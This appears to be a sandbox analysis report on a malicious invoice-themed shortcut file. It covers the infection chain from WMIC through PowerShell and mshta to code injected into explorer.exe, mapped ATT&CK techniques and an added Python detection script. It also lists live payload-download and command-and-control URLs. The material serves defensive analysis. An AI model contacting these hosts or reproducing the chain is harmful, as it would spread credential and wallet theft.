                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQL
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKC
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKC
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIU
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIU
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: number of queries: 1001
                      Source: Yara matchFile source: 00000015.00000003.2738358264.0000000003115000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000003.2632949061.00000000030BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000003.2633160316.00000000030BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 940, type: MEMORYSTR

                      Remote Access Functionality

                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 940, type: MEMORYSTR
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                      MITRE ATT&CK Matrix, listed per tactic; the number the matrix shows in front of a technique is kept in parentheses.

                      Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
                      Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
                      Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
                      Execution: Windows Management Instrumentation (221); Native API (2); Command and Scripting Interpreter (2); PowerShell (3); Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
                      Persistence: DLL Side-Loading (11); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                      Privilege Escalation: Abuse Elevation Control Mechanism (1); DLL Side-Loading (11); Process Injection (412); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                      Defense Evasion: Deobfuscate/Decode Files or Information (11); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (12); Timestomp (1); DLL Side-Loading (11); Masquerading (231); Virtualization/Sandbox Evasion (131); Process Injection (412)
                      Credential Access: OS Credential Dumping (2); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
                      Discovery: System Time Discovery (1); File and Directory Discovery (22); System Information Discovery (157); Security Software Discovery (331); Process Discovery (12); Virtualization/Sandbox Evasion (131); Application Window Discovery (1); System Owner/User Discovery
                      Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
                      Collection: Archive Collected Data (1); Data from Local System (41); Email Collection (1); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
                      Command and Control: Ingress Tool Transfer (1); Encrypted Channel (11); Non-Application Layer Protocol (3); Application Layer Protocol (114); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
                      Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
                      Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
                      Behavior Graph (ID 1579308; sample Rechnung736258.pdf.lnk; start date 21/12/2024; architecture WINDOWS; score 100)

                      Contacted hosts: securesways.click, dimitricostruzioni.ch, 2 other IPs or domains
                      Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Windows shortcut file (LNK) starts blacklisted processes; 14 other signatures

                      Process tree. Graph node ids are in parentheses; the count shown after a process name in the graph (created files / registry values) is kept in square brackets.

                      WMIC.exe (14) [1]
                        signatures: Contains functionality to create processes via WMI; Creates processes via WMI
                        started: powershell.exe (20), conhost.exe (23) [1]
                        powershell.exe (20) [7]
                          signatures: Windows shortcut file (LNK) starts blacklisted processes; Powershell drops PE file
                          started: mshta.exe (25), conhost.exe (30)
                          mshta.exe (25) [16]
                            network: dimitricostruzioni.ch 62.182.21.105:443 (client ports 49704, 49708), SUB6GB, United Kingdom
                            dropped: C:\Users\user\AppData\...\documentcomplie[1], PE32
                            signatures: Windows shortcut file (LNK) starts blacklisted processes; Suspicious powershell command line found
                            started: powershell.exe (32)
                            powershell.exe (32) [17 19]
                              dropped: C:\Users\user\AppData\Roaming\TCUINOVJ.exe, PE32
                              started: TCUINOVJ.exe (35), Acrobat.exe (39), conhost.exe (41)
                              TCUINOVJ.exe (35) [6]
                                dropped: C:\Users\user\iScrPaint.exe, PE32; C:\Users\user\WebUI.dll, PE32
                                signatures: Multi AV Scanner detection for dropped file; Drops PE files to the user root directory
                                started: iScrPaint.exe (43)
                                iScrPaint.exe (43)
                                  dropped: C:\Users\user\AppData\...\iScrPaint.exe, PE32; C:\Users\user\AppData\Roaming\...\WebUI.dll, PE32
                                  signatures: Switches to a custom stack to bypass stack traces; Found direct / indirect Syscall (likely to bypass EDR)
                                  started: iScrPaint.exe (49)
                                  iScrPaint.exe (49)
                                    signatures: Windows shortcut file (LNK) starts blacklisted processes; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces; Found direct / indirect Syscall (likely to bypass EDR)
                                    started: cmd.exe (54)
                                    cmd.exe (54)
                                      dropped: C:\Users\user\AppData\Local\...\umffwoglbib, PE32
                                      signatures: Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; Found hidden mapped module (file has been removed from disk); 2 other signatures
                                      started: explorer.exe (58), conhost.exe (62)
                                      explorer.exe (58)
                                        network: securesways.click 104.21.16.1:443 (client ports 49803, 49815), CLOUDFLARENETUS, United States
                                        signatures: System process connects to network (likely due to code injection or exploit); Query firmware table information (likely to detect VMs); Found many strings related to Crypto-Wallets (likely being stolen); 4 other signatures
                              Acrobat.exe (39) [67]
                                started: AcroCEF.exe (47)
                                AcroCEF.exe (47) [106]
                                  started: AcroCEF.exe (52)
                                  AcroCEF.exe (52) [4]
                      svchost.exe (17) [1 1]
                        network: 127.0.0.1 (unknown, unknown)
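The process chain in the graph is what an endpoint sensor has to catch before the injected explorer.exe reaches securesways.click. The following Python is an added example, not part of the Joe Sandbox report or of the sample: it walks a set of process-creation events (the fields a Sysmon event ID 1 carries) and applies the parent/child pairs behind the report's three Sigma signatures plus two heuristics, explorer.exe started by something other than the logon shell and PE files run from user-writable locations with a LOLBin in their ancestry. The events are constructed to mirror the graph: the PIDs are the graph node ids, the full image paths (the report gives only process names and the drop locations) and the userinit.exe baseline are assumptions.

```python
"""Flag the WMIC -> PowerShell -> mshta -> PowerShell -> dropper -> cmd -> explorer chain
from process-creation events.

Added example, not part of the Joe Sandbox report. Image paths, PIDs (graph node ids) and
the userinit.exe baseline are constructed; only the process names and drop paths come
from the report.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (the fields a Sysmon event ID 1 would carry)."""
    pid: int
    ppid: int
    image: str


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


# Parent -> child pairs the report's Sigma signatures fire on.
SUSPICIOUS_PAIRS = {
    ("wmic.exe", "powershell.exe"): "Suspicious Process Created Via Wmic.EXE",
    ("powershell.exe", "mshta.exe"): "Potentially Suspicious PowerShell Child Processes",
    ("mshta.exe", "powershell.exe"): "Suspicious MSHTA Child Process",
}

# Heuristic (assumption): explorer.exe is normally started by userinit.exe at logon
# or relaunched by itself; cmd.exe starting it, as in the report, is worth a look.
EXPECTED_EXPLORER_PARENTS = {"userinit.exe", "winlogon.exe", "explorer.exe"}

# Image directly under a profile root (C:\Users\<name>\x.exe) or anywhere below
# AppData: the user-writable locations the dropper wrote its PE files to.
USER_WRITABLE = re.compile(r"^c:\\users\\[^\\]+\\(appdata\\|[^\\]+$)", re.IGNORECASE)

LOLBINS = {"wmic.exe", "mshta.exe", "powershell.exe"}


def ancestry(events, pid):
    """Process chain from the oldest recorded ancestor down to pid, as lowercase names."""
    by_pid = {e.pid: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain[::-1]


def analyze(events):
    """Return a list of (rule name, pid) findings over the event set."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        child = basename(e.image)
        parent = by_pid.get(e.ppid)
        pname = basename(parent.image) if parent else None

        rule = SUSPICIOUS_PAIRS.get((pname, child))
        if rule:
            findings.append((rule, e.pid))

        if child == "explorer.exe":
            if pname not in EXPECTED_EXPLORER_PARENTS:
                findings.append(("explorer.exe started by unexpected parent", e.pid))
            if "\\syswow64\\" in e.image.lower():
                # The injected shell in the report is the 32-bit explorer.exe; the
                # real shell runs from C:\Windows on a 64-bit host.
                findings.append(("32-bit explorer.exe on 64-bit host", e.pid))

        if USER_WRITABLE.match(e.image) and LOLBINS & set(ancestry(events, e.ppid)):
            findings.append(("executable in user-writable path with LOLBin ancestry", e.pid))
    return findings


# Constructed events mirroring the behaviour graph (node ids used as PIDs).
EVENTS = [
    ProcEvent(14, 2, r"C:\Windows\System32\wbem\WMIC.exe"),
    ProcEvent(20, 14, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    ProcEvent(25, 20, r"C:\Windows\System32\mshta.exe"),
    ProcEvent(32, 25, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    ProcEvent(35, 32, r"C:\Users\user\AppData\Roaming\TCUINOVJ.exe"),
    ProcEvent(43, 35, r"C:\Users\user\iScrPaint.exe"),
    ProcEvent(49, 43, r"C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe"),
    ProcEvent(54, 49, r"C:\Windows\SysWOW64\cmd.exe"),
    ProcEvent(58, 54, r"C:\Windows\SysWOW64\explorer.exe"),
    # Benign baseline: the logon shell, which must not fire.
    ProcEvent(900, 800, r"C:\Windows\System32\userinit.exe"),
    ProcEvent(1000, 900, r"C:\Windows\explorer.exe"),
]


def main():
    for rule, pid in analyze(EVENTS):
        print(f"[{rule}] pid {pid}: " + " -> ".join(ancestry(EVENTS, pid)))


if __name__ == "__main__":
    main()
```

Each finding prints with the full ancestry so an analyst sees the shortcut-launched WMIC at the root rather than an isolated cmd.exe -> explorer.exe edge; the baseline explorer.exe started by userinit.exe produces nothing.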

                      Antivirus results for the submitted file
                      Source | Detection | Scanner | Label
                      Rechnung736258.pdf.lnk | 16% | ReversingLabs | Shortcut.Trojan.Cross
                      Rechnung736258.pdf.lnk | 24% | Virustotal |

                      Antivirus results for dropped files
                      Source | Detection | Scanner | Label
                      C:\Users\user\AppData\Local\Temp\umffwoglbib | 100% | Joe Sandbox ML |
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\documentcomplie[1] | 34% | ReversingLabs | Win32.Trojan.Fakecaptcha
                      C:\Users\user\AppData\Roaming\BackupPatch\WebUI.dll | 8% | ReversingLabs |
                      C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe | 3% | ReversingLabs |
                      C:\Users\user\AppData\Roaming\TCUINOVJ.exe | 30% | ReversingLabs |
                      C:\Users\user\WebUI.dll | 8% | ReversingLabs |
                      C:\Users\user\iScrPaint.exe | 3% | ReversingLabs |
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      Contacted domains and IPs (no antivirus detection for any entry)
                      Name | IP | Active | Malicious | Reputation
                      dimitricostruzioni.ch | 62.182.21.105 | true | true | unknown
                      bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | high
                      securesways.click | 104.21.16.1 | true | true | unknown
                      x1.i.lencr.org | unknown | unknown | false | high
                      Domains and URLs (no antivirus detection for any entry)
                      Name | Malicious | Reputation
                      securesways.click | true | unknown
                      aspecteirs.lat | false | high
                      sustainskelet.lat | false | high
                      rapeflowwj.lat | false | high
                      energyaffai.lat | false | high
                      https://securesways.click/api | true | unknown
                      grannyejh.lat | false | high
                      necklacebudi.lat | false | high
                      crosshuaht.lat | false | high
                      https://dimitricostruzioni.ch/new/files/Documents/KlarnaInvoice42611.pdf | false | unknown
                      URLs found in process memory. Each entry gives the string as extracted (trailing characters are memory residue and are kept as reported), whether it is flagged malicious, its reputation, and the process and memory dump it came from. No antivirus detection for any entry.

                      https://duckduckgo.com/chrome_newtab (malicious: false; reputation: high)
                        source: explorer.exe, 00000015.00000003.2634324931.0000000005EC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634404916.0000000005EC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634516058.0000000005EC6000.00000004.00000001.00020000.00000000.sdmp
                      https://duckduckgo.com/ac/?q= (malicious: false; reputation: high)
                        source: explorer.exe, 00000015.00000003.2634324931.0000000005EC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634404916.0000000005EC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634516058.0000000005EC6000.00000004.00000001.00020000.00000000.sdmp
                      http://www.vmware.com/0 (malicious: false; reputation: high)
                        source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmp
                      https://dimitricostruzioni.ch/dimitri/T (malicious: false; reputation: unknown)
                        source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmp
                      https://dimitricostruzioni.ch/dimitri/TCUINOVJ.e (malicious: false; reputation: unknown)
                        source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmp
                      https://dimitricostruzioni.ch/documentcompliesLO (malicious: false; reputation: unknown)
                        source: mshta.exe, 00000005.00000002.2677433600.000001BB90E50000.00000004.00000020.00020000.00000000.sdmp
                      https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743. (malicious: false; reputation: high)
                        source: explorer.exe, 00000015.00000003.2689095480.0000000005F1D000.00000004.00000001.00020000.00000000.sdmp
                      https://dimitricostruzioni.ch/documentcomplie~l (malicious: false; reputation: unknown)
                        source: mshta.exe, 00000005.00000002.2683407387.000001C397F10000.00000004.00000020.00020000.00000000.sdmp
                      https://g.live.com/odclientsettings/ProdV2.C: (malicious: false; reputation: high)
                        source: svchost.exe, 00000006.00000003.2080132292.0000020861750000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr
                      http://epscd.catcert.net/crl/ec-acc.crl0. (malicious: false; reputation: unknown)
                        source: TCUINOVJ.exe, 0000000F.00000003.2256610867.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000003.2271753574.0000000000830000.00000004.00000020.00020000.00000000.sdmp
                      http://dimitricostruzioni.ch (malicious: false; reputation: unknown)
                        source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmp
                      https://dimitricostruzioni.ch/dimitri/TCUINO (malicious: false; reputation: unknown)
                        source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmp
                      https://dimitricostruzioni.ch/documentcomplieth= (malicious: false; reputation: unknown)
                        source: WMIC.exe, 00000000.00000003.2024092555.00000155FA065000.00000004.00000020.00020000.00000000.sdmp
                      https://dimitricostruzioni.ch/dimitri/TCUINOVJ.ex (malicious: false; reputation: unknown)
                        source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmp
                      https://dimitricostruzioni.ch/documentcomplie=C: (malicious: false; reputation: unknown)
                        source: WMIC.exe, 00000000.00000002.2025601341.00000155F9FE0000.00000004.00000020.00020000.00000000.sdmp
                      https://nuget.org/nuget.exe (malicious: false; reputation: high)
                        source: powershell.exe, 00000007.00000002.2554482573.000002E25D762000.00000004.00000800.00020000.00000000.sdmp
                      https://dimitricostruzioni.ch/di (malicious: false; reputation: unknown)
                        source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmp
                      https://dimitricostruzioni.ch/dimitri/TCUIN (malicious: false; reputation: unknown)
                        source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmp
                      https://dimitricostruzioni.ch/documentcomplies (malicious: false; reputation: unknown)
                        source: mshta.exe, 00000005.00000003.2667650718.000001BB90B1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2675038959.000001BB90B1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2672513953.000001BB90B1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2677050404.000001BB90B1D000.00000004.00000020.00020000.00000000.sdmp
                      https://dimitricostruzioni.ch/d (malicious: true; reputation: unknown)
                        source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmp
                      https://dimitricostruzioni.ch/dimitri/TCU (malicious: false; reputation: unknown)
                        source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmp
                      https://dimitricostruzioni.ch/documentcomplie... (malicious: false; reputation: unknown)
                        source: mshta.exe, 00000005.00000003.2666686122.000001C3937ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2667263029.000001C3937F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2682370166.000001C3937F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2667620476.000001C3937F4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2669434915.000001C3937F5000.00000004.00000020.00020000.00000000.sdmp
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name (malicious: false; reputation: high)
                        source: powershell.exe, 00000007.00000002.2250832181.000002E24D6F1000.00000004.00000800.00020000.00000000.sdmp
                      http://pesterbdd.com/images/Pester.png (malicious: false; reputation: high)
                        source: powershell.exe, 00000007.00000002.2250832181.000002E24D91A000.00000004.00000800.00020000.00000000.sdmp
                      http://www.apache.org/licenses/LICENSE-2.0.html (malicious: false; reputation: high)
                        source: powershell.exe, 00000007.00000002.2250832181.000002E24D91A000.00000004.00000800.00020000.00000000.sdmp
                      https://securesways.click/apiaX (malicious: false; reputation: unknown)
                        source: explorer.exe, 00000015.00000003.2734517516.0000000003130000.00000004.00000020.00020000.00000000.sdmp
                      https://contoso.com/Icon (malicious: false; reputation: high)
                        source: powershell.exe, 00000007.00000002.2554482573.000002E25D762000.00000004.00000800.00020000.00000000.sdmp
                      https://dimitricostruzioni.ch/documentcompliep (malicious: false; reputation: unknown)
                        source: mshta.exe, 00000005.00000002.2676895482.000001BB90B07000.00000004.00000020.00020000.00000000.sdmp
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= (malicious: false; reputation: high)
                        source: explorer.exe, 00000015.00000003.2634324931.0000000005EC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634404916.0000000005EC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634516058.0000000005EC6000.00000004.00000001.00020000.00000000.sdmp
                      http://crl.rootca1.amazontrust.com/rootca1.crl0 (malicious: false; reputation: high)
                        source: explorer.exe, 00000015.00000003.2687174165.0000000005F47000.00000004.00000001.00020000.00000000.sdmp
                      http://crl.ver) (malicious: false; reputation: high)
                        source: svchost.exe, 00000006.00000002.3283350977.0000020861A00000.00000004.00000020.00020000.00000000.sdmp
                      http://ocsp.rootca1.amazontrust.com0: (malicious: false; reputation: high)
                        source: explorer.exe, 00000015.00000003.2687174165.0000000005F47000.00000004.00000001.00020000.00000000.sdmp
                      https://dimitricostruzioni.ch/documentcomplieV (malicious: false; reputation: unknown)
                        source: mshta.exe, 00000005.00000003.2667650718.000001BB90B1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2675038959.000001BB90B1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2672513953.000001BB90B1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2677050404.000001BB90B1D000.00000004.00000020.00020000.00000000.sdmp
                      https://securesways.click/apiM (malicious: false; reputation: unknown)
                        source: explorer.exe, 00000015.00000003.2686677332.0000000003130000.00000004.00000020.00020000.00000000.sdmp
                      https://www.ecosia.org/newtab/ (malicious: false; reputation: high)
                        source: explorer.exe, 00000015.00000003.2634324931.0000000005EC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634404916.0000000005EC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634516058.0000000005EC6000.00000004.00000001.00020000.00000000.sdmp
                      http://www.symauth.com/cps0( (malicious: false; reputation: high)
                        source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmp
                      https://dimitricostruzioni.ch/dimitri/TCUINOVJ. (malicious: false; reputation: unknown)
                        source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmp
                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br (malicious: false; reputation: high)
                        source: explorer.exe, 00000015.00000003.2688636073.00000000061B9000.00000004.00000001.00020000.00000000.sdmp
                      https://github.com/Pester/Pester (malicious: false; reputation: high)
                        source: powershell.exe, 00000007.00000002.2250832181.000002E24D91A000.00000004.00000800.00020000.00000000.sdmp
                      https://securesways.click/apiU (malicious: false; reputation: unknown)
                        source: explorer.exe, 00000015.00000003.2632949061.00000000030BD000.00000004.00000020.00020000.00000000.sdmp
                      https://www.catcert.net/verarrel (malicious: false; reputation: high)
                        source: TCUINOVJ.exe, 0000000F.00000003.2256610867.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000003.2271753574.0000000000830000.00000004.00000020.00020000.00000000.sdmp
                      http://crl.micro (malicious: false; reputation: high)
                        source: explorer.exe, 00000015.00000003.2840015148.0000000003107000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2632949061.00000000030BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2839435655.00000000030BD000.00000004.00000020.00020000.00000000.sdmp
                      https://dimitricostruzioni.ch/documentcomplieH (malicious: false; reputation: unknown)
                        source: mshta.exe, 00000005.00000002.2678187215.000001C3929E0000.00000004.00000800.00020000.00000000.sdmp
                      http://www.symauth.com/rpa00 (malicious: false; reputation: high)
                        source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                          https://dimitricostruzioni.ch/dimitrpowershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            https://dimitricostruzioni.ch/dimitri/TCpowershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              https://securesways.click/apiaexplorer.exe, 00000015.00000003.2734517516.0000000003130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                http://www.info-zip.org/iScrPaint.exe, 00000010.00000002.2297719622.0000000008AF6000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F28000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://dimitricostruzioni.cpowershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                                    unknown
                                                                                                                                                    https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refexplorer.exe, 00000015.00000003.2689095480.0000000005F1D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://dimitricostruzioni.ch/dimitripowershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        unknown
                                                                                                                                                        https://securesways.click/api1Nexplorer.exe, 00000015.00000003.2839435655.00000000030BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2840914690.00000000030BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477explorer.exe, 00000015.00000003.2689095480.0000000005F1D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://bugreports.qt-project.org/QHttpNetworkConnectionChannel::_q_receiveReply()TCUINOVJ.exe, 0000000F.00000003.2256610867.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000002.2331881203.000000006C117000.00000002.00000001.01000000.00000011.sdmp, iScrPaint.exe, 00000011.00000002.2395944422.000000006B7CC000.00000002.00000001.01000000.00000014.sdmp, WebUI.dll.15.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://securesways.click/apisexplorer.exe, 00000015.00000003.2763626121.000000000311D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2763685587.0000000003130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                unknown
                                                                                                                                                                https://dimitricostruzioni.ch/documentcomplie$global:?powershell.exefalse
                                                                                                                                                                  unknown
                                                                                                                                                                  https://dimitricostruzioni.ch/dimipowershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    https://dimitricostruzioni.ch/documentcomplie(mshta.exe, 00000005.00000002.2676895482.000001BB90B07000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-/W3C/DTDTCUINOVJ.exe, 0000000F.00000003.2256610867.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000002.2331881203.000000006C208000.00000002.00000001.01000000.00000011.sdmp, iScrPaint.exe, 00000011.00000002.2395944422.000000006B8A4000.00000002.00000001.01000000.00000014.sdmp, WebUI.dll.15.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtdTCUINOVJ.exe, 0000000F.00000003.2256610867.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000002.2331881203.000000006C208000.00000002.00000001.01000000.00000011.sdmp, iScrPaint.exe, 00000011.00000002.2395944422.000000006B8A4000.00000002.00000001.01000000.00000014.sdmp, WebUI.dll.15.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiexplorer.exe, 00000015.00000003.2689095480.0000000005F1D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://contoso.com/Licensepowershell.exe, 00000007.00000002.2554482573.000002E25D762000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://dimitricostruzioni.ch/documentcomplie1mshta.exe, 00000005.00000002.2676895482.000001BB90B07000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                http://schemas.xmlsoap.org/soap/envelope/TCUINOVJ.exe, 0000000F.00000003.2256610867.00000000026E6000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000000.2259726588.0000000000401000.00000020.00000001.01000000.00000010.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://dimitricostruzioni.ch/documentcomplie...Kmshta.exe, 00000005.00000002.2679004868.000001C39374B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=explorer.exe, 00000015.00000003.2634324931.0000000005EC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634404916.0000000005EC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634516058.0000000005EC6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
